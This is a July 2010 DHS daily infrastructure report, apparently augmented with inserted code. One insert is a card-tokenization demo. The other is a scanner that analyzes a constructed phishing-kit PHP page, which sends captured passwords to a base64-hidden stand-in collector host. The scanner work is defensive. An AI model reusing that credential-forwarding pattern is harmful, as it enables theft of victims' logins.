Department of Homeland Security Daily Open Source Infrastructure Report

Monday, July 26, 2010

Complete DHS Daily Report for July 26, 2010

Daily Report

Top Stories

• According to WBBM, a suspicious package left at the front door of the Planned Parenthood Center on North La Salle Drive July 22 was one of four incidents that took place in less than 24 hours in Chicago. Other incidents included: Suspicious material found inside a clerk’s office in the Dirksen Federal Building; a suspicious cylinder found at a bus shelter at Columbus and North Water; and a suspicious package discovered on North Wells.

31. July 22, WBBM Chicago – (Illinois) Authorities investigate string of bomb scares. A suspicious package was left at the front door of the Planned Parenthood Center on North La Salle Drive in Chicago July 22. “This is for all the doctors and what you do for women,” a note said. Inside the box was a newspaper and a dead possum. On July 3, a package with the same message was left in a planter outside Family Planning Associates Medical Group on North Elston. That box had a dead skunk in it. What happened at Planned Parenthood was just one of four similar incidents that took place in less than 24 hours in Chicago. The fire department was called to the Dirksen Federal Building, where suspicious material was found in an envelope inside a clerk’s office on the 20th floor. It was determined not to be a threat. Also, overnight, officers found a suspicious cylinder at a bus shelter at Columbus and North Water. A bomb and arson robot was used to check it out, and the cylinder was blown up. A suspicious package was also discovered on North Wells in Old Town July 21. That package turned out to be a radio speaker in a box. Planned Parenthood has several surveillance cameras outside their building. The organization has given the tape to law enforcement. Source:

37. July 22, WBBM 2 Chicago – (Illinois) Suspicious items found at Dirksen federal building. Unidentified suspicious material was discovered in an envelope at the Dirksen Federal Building in Chicago July 22. The material has since been deemed safe. The fire department called a level 1 hazardous materials response for the items, which were found on the 20th floor of the federal courthouse at 219 S. Dearborn St. sometime shortly after 10 a.m. The 20th floor houses courtrooms, as well as judges’ and clerks’ offices. Sources tell CBS 2 an envelope with a suspicious substance was found in a clerk’s office. The situation was secured at 10:55 a.m. and the envelope was deemed safe. It has not yet been learned exactly what the substance was. Fire trucks were seen pulling up outside the courthouse. Many high-profile court cases and trials are underway in the building, including that of the deposed former Illinois governor. The building was not evacuated. Source:

54. July 22, NBC Chicago – (Illinois) Bomb scare evacuates NBC Tower. NBC Tower in Chicago was evacuated early July 22 after police received a call reporting a suspicious cardboard canister inside the bus shelter at the corner of North Water and Columbus Drive. The shelter is located at the front of the tower’s Columbus entrance. The Chicago Police Bomb and Arson Squad ordered guests of the Sheraton Hotel to stay put and evacuated NBC. The squad then used two robots to determine whether the package was a bomb. “A short time later, a loud explosion sound alerted onlookers. The box was detonated and the scene was rendered safe,” said a police news affairs officer. The suspicious package was one of two reported in the last 24 hours. Another call came in at 8:50 p.m. reporting a package in the Old Town neighborhood. Police found a package in a building in the 1500 block of North Wells Street. Bomb and arson investigators determined the package contained a radio speaker. Source:

• Reuters reports that the tourism industry in the Gulf of Mexico could suffer for up to three years with $22.7 billion in lost revenue because of the largest oil spill in U.S. history, the U.S. Travel Association said July 22.

55. July 22, Reuters – (National) Gulf tourism may lose $22.7 billion to oil spill. The tourism industry in the Gulf of Mexico could suffer for up to three years with $22.7 billion in lost revenue because of the largest oil spill in U.S. history, the U.S. Travel Association said July 22. The study projected the impact of the BP oil spill on travel to the five Gulf Coast states — Florida, Louisiana, Mississippi, Alabama and Texas. Oil fears have sparked a double-digit drop in plans for travel to the region, even in parts of Florida where oil has not yet washed ashore. The association proposed a 10-point “Roadmap to Recovery” plan for the government to help communities hit by the oil spill by informing the public, and adding incentives to travel to the affected areas. The plan includes the creation of a $500-million marketing program, to be funded by BP, to share accurate information on the oil spill and attract visitors. It also calls for setting up an online system where travelers could get current information about which areas are open for travel and business. Source:


Banking and Finance Sector

10. July 23, WHDH 7 Boston – (Massachusetts) ‘Backstreet Bandit’ sought in bank robberies. The FBI is asking for help in tracking down a suspect in several bank robberies in Massachusetts known as the “Backstreet Bandit.” He has been spotted wearing a fedora-style hat and flashy clothes similar to those of a member of the pop group the Backstreet Boys. In all the robberies, he has allegedly handed the teller a manila envelope and then demanded money. The suspect was caught on surveillance camera allegedly robbing three banks in Malden, Revere and Saugus since June. The most recent crime happened July 19. Source:

11. July 23, WIVB 4 Buffalo – (National) Five indicted for bank fraud conspiracy. Five people have been indicted for a bank fraud conspiracy that ran from July 2009 until December 2009. A federal grand jury in Buffalo, New York has returned a four-count indictment charging the five suspects, all residing in New York or Florida, with conspiracy to commit bank fraud. The five are also charged with production and use of counterfeit access devices, possession of device-making equipment and aggravated identity theft. The charges carry a mandatory minimum penalty of two years in prison and a maximum of 30 years, a fine of $1 million, or both. An assistant U.S. attorney said they fraudulently obtained the credit and debit account numbers of hundreds of individual bank customers, used those account numbers to produce hundreds of counterfeit credit and debit cards, and then used those counterfeit cards to fraudulently withdraw cash from ATMs. Those cash machines were located at the Seneca Niagara Casino, the Seneca Allegany Casino, the Salamanca Bingo Hall and various other casinos located throughout the country. In total, the defendants and other co-conspirators withdrew $510,500 using the counterfeit cards. Source:

12. July 22, DarkReading – (National) Tokens a tempting option for securing cardholder data. As merchants and credit-card processors continue to struggle with securing cardholder data for the sake of PCI compliance and overall brand protection, many are increasingly turning to tokenization technology as a way to reduce the scope of their risk. But vendors in the burgeoning market are still skirmishing over technology definitions and standards. Meanwhile, Visa recently released a best-practices guide to relieve confusion about tokenization and help merchants, processors, acquirers, and others in the payment ecosystem understand how to comply with PCI via tokenization. Tokenization replaces live cardholder primary account numbers (PANs) in databases with stand-in values that are meaningless to data thieves but can be cross-referenced to the real data, through a separately secured vault, when a transaction genuinely needs it. Compared to full encryption products, tokenization is often much easier to deploy and is less likely to disrupt applications that tap into databases for customer information. Beyond easier deployment and smoother interaction with applications, tokenization’s biggest draw is that it can dramatically reduce the scope, and therefore the cost, of PCI audits, because systems that hold only tokens no longer hold cardholder data. An analyst for Forrester Research calls the complete elimination of cardholder data from merchant databases the “Holy Grail” of PCI, something that can be accomplished if merchants transfer the risk to card processors, which are increasingly teaming up with tokenization vendors or developing home-grown technology to offer encryption and tokenization services. Source:
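The mechanism the item describes, as an added illustration rather than code from the article or from any vendor: the vault issues a random token that keeps the PAN’s length and last four digits, stores the PAN-to-token mapping on its own side, and the merchant persists only the token. The vault’s reverse index is keyed by an HMAC of the PAN rather than the PAN itself, and every token is chosen to fail the Luhn check so it can never be mistaken for, or replayed as, a real card number. The vault living in the same process as the merchant code is an assumption made only so the example runs offline; in practice it sits with the processor or tokenization vendor.

```python
import hashlib
import hmac
import secrets


def luhn_valid(digits: str) -> bool:
    """Luhn check as used for card numbers; a real PAN passes, our tokens never do."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class TokenVault:
    """Stand-in for the vault a processor or tokenization vendor operates.

    The merchant application only ever receives tokens from it. It runs in the
    same process here purely so the example works offline (assumption).
    """

    def __init__(self, index_key: bytes):
        self._pan_by_token = {}
        self._token_by_pan_hmac = {}   # reverse index keyed by HMAC, not by PAN
        self._index_key = index_key

    def _index(self, pan: str) -> str:
        return hmac.new(self._index_key, pan.encode(), hashlib.sha256).hexdigest()

    def tokenize(self, pan: str) -> str:
        pan = pan.replace(" ", "")
        if not (pan.isdigit() and 13 <= len(pan) <= 19 and luhn_valid(pan)):
            raise ValueError("not a plausible PAN")
        key = self._index(pan)
        if key in self._token_by_pan_hmac:            # same PAN -> same token
            return self._token_by_pan_hmac[key]
        while True:
            # Keep the length and the last four digits so receipts, refunds and
            # reports keep working; randomise everything else; reject any
            # candidate that passes Luhn so a token can never double as a PAN.
            body = "".join(secrets.choice("0123456789") for _ in range(len(pan) - 4))
            token = body + pan[-4:]
            if token != pan and not luhn_valid(token) and token not in self._pan_by_token:
                break
        self._pan_by_token[token] = pan
        self._token_by_pan_hmac[key] = token
        return token

    def detokenize(self, token: str) -> str:
        """Only the processor-side code path that actually needs the PAN calls this."""
        return self._pan_by_token[token]


def merchant_checkout(vault: TokenVault, pan: str, amount_cents: int) -> dict:
    """What the merchant persists: a token and display data, never the PAN."""
    token = vault.tokenize(pan)
    return {"token": token, "last4": token[-4:], "amount_cents": amount_cents}


def contains_live_pan(records) -> bool:
    """Scope check: does any stored value look like a real card number?"""
    for rec in records:
        for value in rec.values():
            s = str(value)
            if s.isdigit() and 13 <= len(s) <= 19 and luhn_valid(s):
                return True
    return False


if __name__ == "__main__":
    vault = TokenVault(index_key=secrets.token_bytes(32))
    # 4111 1111 1111 1111 is the standard Visa test number, not a live card.
    orders = [merchant_checkout(vault, "4111 1111 1111 1111", 2499)]
    print(orders[0], "live PAN in merchant data:", contains_live_pan(orders))
```

The `contains_live_pan` sweep is the kind of check an assessor runs over a merchant database to confirm that tokenization actually took the system out of scope: if anything Luhn-valid of card length is still sitting in a table, the vault is not the only place PANs live.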

13. July 22, Chicago Southtown Star – (Illinois) Feds crack $35M mortgage fraud scheme. A south Chicago man is among seven people indicted July 22 in an alleged $35-million mortgage fraud scheme involving more than 120 residential properties, most on the South Side. The suspect, of South Holland, allegedly bought and sold homes, recruiting others to act as purchasers, costing lenders and financial institutions at least $16 million in losses on mortgage loans that were not repaid or fully recovered through foreclosure, according to a release from the U.S. Attorney’s office. Also indicted, according to the release, were six other suspects. The main suspect, 44 years old, who operated various businesses including a property-renovation company called Jireh Development in South Holland, was arrested July 20 by FBI agents and U.S. Postal Service inspectors. He was charged with mail, wire and bank fraud in an 18-count indictment returned by a federal grand jury last week and unsealed following his arrest. The six other defendants are each charged with one or more counts of fraud in the same scheme. They are scheduled for arraignment at 11 a.m. July 27. The scheme allegedly ran between June 2004 and May 2008. According to the indictment, the defendants provided false real estate loan applications and supporting documents to banks and lenders on behalf of prospective purchasers, knowing the individuals, whom they had recruited, could not or did not intend to fully repay. The main suspect and the others referred and recruited individuals to buy homes by promising they would not have to use any of their own money for down payments or deposits, and would be paid to act as purchasers and attend closings. They were also told they would not have to make any payments on the mortgages and that the homes were ready for occupancy or renovation, the release said. Source:,072210-mortgagefraud.article

14. July 22, Bellingham Herald – (Washington) Text message scam targets North Coast Credit Union users. Bellingham, Washington police are warning the public about a text message scam targeting North Coast Credit Union account holders who are also Nextel phone subscribers. The text messages went out sometime late July 21, said a spokesman for the Bellingham Police Department. The messages tell account holders that their accounts have been compromised and direct them to call a certain phone number. When they do, they are asked for their 16-digit card number plus PIN, which is everything needed to clone the card and drain the account at an ATM. North Coast Credit Union received more than 100 calls from account holders July 22 asking whether the text messages were real or a scam, said the credit union’s senior vice president and chief operations officer. Only one person so far was known to have entered their personal account information through the scam phone number. That person did not lose any money because the credit union canceled the card. Source:

Information Technology

43. July 23, Sophos – (International) Hell Pizza security breach: I’ll have extra passwords with that. Hell Pizza, a popular chain of pizza restaurants in New Zealand with other branches around the world, has found itself in the embarrassing situation of having to admit that a hacker appears to have stolen a large portion of its customer database. According to Risky.Biz, more than one hacker has accessed Hell Pizza’s poorly secured 400MB database, which has 230,000 entries containing full names and addresses, phone numbers, e-mail addresses and passwords. Hell Pizza has posted a letter to customers on its Facebook page about the incident. Some customers have noted with curiosity that Hell Pizza posted the communication as a graphical image rather than as plain text; plain text would have let search engines find and index the notice across the Internet, whereas an image keeps it from being searched. Source:

44. July 23, The Register – (International) Dell blames staff for malware infection. Dell said human error was to blame for mistakes which led it to ship a number of replacement server motherboards to customers pre-loaded with spyware. The company declined to say whether it was running anti-virus software at its factory but said it had taken 16 steps to improve its processes. The infection hit replacement PowerEdge R310, R410, R510 and T410 boards. The direct seller said less than 1 percent of boards were affected, and complete new server systems were safe. Dell has still not said how the W32.Spybot worm got into its systems and onto its hardware. A Dell spokesman said the problem was worldwide, but all infected motherboards had now been removed from the supply chain and it was already shipping clean boards. He said the spyware would only infect people running unpatched versions of Windows without any anti-virus software. Source:

45. July 23, The New New Internet – (International) Hacker enlists other unwitting hackers in scam. Skilled malware writers have found a way for less experienced cyber criminals to do their work for them. A new freeware phishing kit being offered in hacker forums offers a way to set up fake Web sites and spam e-mails to capture users’ legitimate log-in credentials. However, the kit’s authors are able to siphon off a significant portion of the entered log-in credentials, leaving only a few for the cyber criminals deploying the kit. This lets the authors collect credentials without doing the tedious work of setting up spam campaigns themselves. The kit appears to have been developed in Algeria and has Arabic-language tutorials but operates in English, according to Imperva, a database-security company. “Unlike previous phishing kits available for years, this new approach lives in the cloud and relies on hackers exploiting other hackers,” according to a blog post by Imperva. “And with the new cloud-based approach the infrastructure for this phishing kit never goes away. Why? In traditional schemes when you take down a server you take down not only the web page but also the back end data collection capability. In this cloud version, data collection is hosted separately from the phishing web sites which means hackers only need to repost the web front end in a new location to be back in business.” Source:
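When a kit like this is recovered from a compromised host, the first question an incident responder asks is where the captured credentials actually go. The following is an added example (not code from the article, from Imperva, or from any real kit) of a small static scanner over a constructed PHP collector page: it inlines `base64_decode()` literals, resolves simple string variables, and lists every mail, HTTP and redirect target, then reports the targets that were only visible after de-obfuscation, which is where a kit author’s hidden collector sits. The sample kit text, the e-mail address and the collector URL are all constructed for the example.

```python
import base64
import re

# Constructed sample of a kit's credential-collector page (not code from any
# real kit). The operator who downloads the kit sees the mail() line and thinks
# results go only to them; the second endpoint is hidden behind base64.
SAMPLE_KIT = """<?php
$ip  = $_SERVER['REMOTE_ADDR'];
$msg = "user: " . $_POST['user'] . " pass: " . $_POST['pass'] . " ip: " . $ip;
$to  = "operator@example.com";
mail($to, "New result", $msg);
// "statistics" - quietly forwards every capture to the kit author
$u = base64_decode("aHR0cDovL2NvbGxlY3Rvci5leGFtcGxlLm5ldC9nLnBocA==");
@file_get_contents($u . "?d=" . urlencode($msg));
header("Location: https://www.example.com/");
?>"""

ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
B64_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# sinks that move data off the box, plus header() so redirects are labelled rather than missed
CALL_RE = re.compile(
    r'\b(mail|file_get_contents|curl_init|curl_setopt|fopen|fsockopen|header)\s*\(([^;]*)'
)
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
URL_RE = re.compile(r'https?://[^\s"\'<>)]+')


def decode_obfuscated(src: str) -> str:
    """Inline base64_decode("...") literals so the later passes see the real string."""
    def repl(m):
        try:
            return '"' + base64.b64decode(m.group(1), validate=True).decode("utf-8") + '"'
        except (ValueError, UnicodeDecodeError):
            return m.group(0)          # not really base64: leave the call as written
    return B64_RE.sub(repl, src)


def find_endpoints(src: str):
    """Return sorted (kind, target) pairs for every call that sends data somewhere."""
    src = decode_obfuscated(src)
    literals = dict(ASSIGN_RE.findall(src))
    found = set()
    for fn, args in CALL_RE.findall(src):
        # substitute single-assignment string variables; anything else becomes ""
        resolved = re.sub(r"\$(\w+)", lambda m: literals.get(m.group(1), ""), args)
        kind = "redirect" if fn == "header" else "mail" if fn == "mail" else "http"
        for target in EMAIL_RE.findall(resolved) + URL_RE.findall(resolved):
            found.add((kind, target))
    return sorted(found)


def hidden_endpoints(src: str):
    """Targets that only appear after de-obfuscation: the kit author's cut."""
    return [t for kind, t in find_endpoints(src) if kind != "redirect" and t not in src]


if __name__ == "__main__":
    for kind, target in find_endpoints(SAMPLE_KIT):
        print(f"{kind:9} {target}")
    print("hidden:", hidden_endpoints(SAMPLE_KIT))
```

The scanner is deliberately regex-based so it runs over a directory of recovered PHP without a PHP interpreter; real kits also hide targets with `str_rot13`, `gzinflate` or split string concatenation, so treat an empty `hidden_endpoints` result as a reason to read the code, not as a clean bill of health.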

46. July 23, The H Security – (International) vBulletin divulges MySQL login. A critical security vulnerability in the widely used forum software vBulletin lets attackers easily obtain the MySQL credentials of any forum running the affected version. As a number of blogs report, if the term “database” is entered into the FAQ module’s search box, the module hands over the database host, name, user name and password on a silver platter. With those credentials an attacker who can reach the database server has power over the forum’s entire database, including personal forum user data. The vendor said that version 3.8.6 of the software is vulnerable. A patch has already been made available. In a brief Google search, The H’s associates at heise Security found countless vulnerable sites that were open to attack. Source:

47. July 22, IDG News Service – (International) Virus writers are picking up new Microsoft attack. The Windows attack used by a recently discovered worm is being picked up by other virus writers and will soon become much more widespread, according to security vendor Eset. Eset reported July 22 that two new families of malicious software have popped up, both of which exploit a vulnerability in the way Windows processes .lnk (shortcut) files, which provide shortcuts to other files on the system; simply displaying the icon of a crafted shortcut is enough to trigger it. The vulnerability was first exploited by the Stuxnet worm, discovered on computer systems in Iran last month. The highly sophisticated Stuxnet targets systems running Siemens industrial control system management software. The worm steals SCADA (supervisory control and data acquisition) project files from Siemens’ computer systems. The newly discovered malware is “far less sophisticated” than Stuxnet and “suggests bottom feeders seizing on techniques developed by others,” said an Eset researcher writing in a blog post. One of the new samples installs a keystroke logger, a tool hackers use to steal passwords and other data, on the victim’s computer. “The server used to deliver the components used in this attack is presently located in the U.S., but the IP is assigned to a customer in China,” he said. The other variant could be used to install one of several different pieces of malicious software. Source:

48. July 22, DarkReading – (International) Microsoft launches ‘coordinated’ vulnerability disclosure program. Microsoft July 22 revealed a new, modified approach to how it works with security researchers and handles vulnerability disclosures, including working with researchers to publicly release vulnerability details of a zero-day flaw when attacks are under way. The director of Microsoft Security Response Center said Microsoft is now promoting “coordinated vulnerability disclosure” (CVD) and moving toward working more closely with researchers in coordinating the release of details on new, unpatched bugs. The director said the term “responsible disclosure” had become too emotionally charged and it was time for a shift in philosophy. If active attacks are exploiting an unpatched flaw, then it makes sense to alert users about the bug. But Microsoft has not changed its stance against full disclosure, where a bug finder releases details of a flaw without the vendor getting a shot at patching it first. The director said Microsoft is, however, willing to work with researchers who go that route to work on a fix for the flaws they reveal publicly. Source:

Communications Sector

49. July 22, Reuters – (International) Baidu may press claims over hackers: U.S. judge. China’s leading search engine, Baidu Inc, can sue its U.S.-based domain name service provider, Register.com, Inc, for breach of contract, gross negligence and recklessness related to an attack by hackers, a U.S. judge ruled July 22. The order in federal court in New York allows Baidu to proceed with a lawsuit filed in January. The January 11 attack prevented Internet users around the world from gaining access to Baidu for 5 hours and disrupted its operations for 2 days, according to the lawsuit. Baidu holds the greatest share of the Chinese online search market. Hackers calling themselves the Iranian Cyber Army hijacked Baidu’s home page by gaining unauthorized access to Baidu’s account at Register.com and redirecting the domain. Weeks before, the same hackers claimed to have done the same thing to the popular microblogging site Twitter. Baidu alleged a service representative allowed an intruder, who falsely claimed to be an agent of Baidu, access to Baidu’s account even though the intruder provided non-matching security codes. Source:

50. July 22, Santa Maria Times – (California) Cut cable disrupts local phone service. A tree trimming crew accidentally cut a fiber optic cable that ran between Solvang and Goleta, California July 22, disrupting phone, cell phone, and Internet service to more than 8,000 customers, including that of Lompoc Valley Medical Center. A Verizon media relations manager said the severed line disrupted his company’s service between 8 and 11:25 a.m., “primarily around the Santa Maria and Solvang area.” Other telecommunication companies in the Lompoc area besides Verizon were also affected by the line cut. T-Mobile phone customers reported service problems. The “main trunk line” of the Lompoc Valley Medical Center was also affected by the outage, according to its chief information officer. The crucial lines, including the hospital’s main number and the emergency number, were rerouted to a secondary phone service that remained active. City halls in Solvang and Lompoc were affected by the outage. Employees for the city of Santa Maria and the Santa Barbara County Sheriff’s Department reported no widespread disruption to their phones or Internet connections. Source: